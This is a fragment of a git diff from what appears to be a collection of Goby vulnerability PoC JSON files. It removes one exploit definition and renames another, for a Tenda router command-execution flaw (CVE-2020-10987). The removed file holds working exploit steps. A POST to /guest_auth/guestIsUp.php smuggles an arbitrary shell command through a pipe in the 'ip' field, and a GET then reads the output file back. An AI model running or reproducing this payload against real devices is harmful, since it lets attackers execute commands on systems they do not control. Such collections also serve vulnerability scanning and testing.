not found.", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "not contains", - "value": ">__<", - "bz": "" - }, - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - } - ] - }, - "SetVariable": [] - } - ], - "ExploitSteps": [ - "OR", - { - "Request": { - "method": "POST", - "uri": "/guest_auth/guestIsUp.php", - "follow_redirect": false, - "header": { - "Content-Type": "application/x-www-form-urlencoded" - }, - "data_type": "text", - "data": "mac=1&ip=127.0.0.1|{{{Cmd}}} > PeiQi.txt" - }, - "SetVariable": [ - "output|lastbody" - ] - }, - { - "Request": { - "method": "GET", - "uri": "/guest_auth/PeiQi.txt", - "follow_redirect": false, - "header": { - "Content-Type": "application/x-www-form-urlencoded" - }, - "data_type": "text", - "data": "" - }, - "SetVariable": [ - "output|lastbody" - ] - } - ], - "PostTime": "2021-01-26 10:37:09", - "GobyVersion": "1.8.230" -} \ No newline at end of file diff --git a/json/╠┌┤∩┬╖╙╔╞≈-setusbunload-├ⁿ┴ε╓┤╨╨┬⌐╢┤-ú¿CVE-2020-10987ú⌐.json b/json/腾达路由器 setusbunload 命令执行漏洞 (CVE-2020-10987).json similarity index 100% rename from json/╠┌┤∩┬╖╙╔╞≈-setusbunload-├ⁿ┴ε╓┤╨╨┬⌐╢┤-ú¿CVE-2020-10987ú⌐.json rename to json/腾达路由器 setusbunload 命令执行漏洞 (CVE-2020-10987).json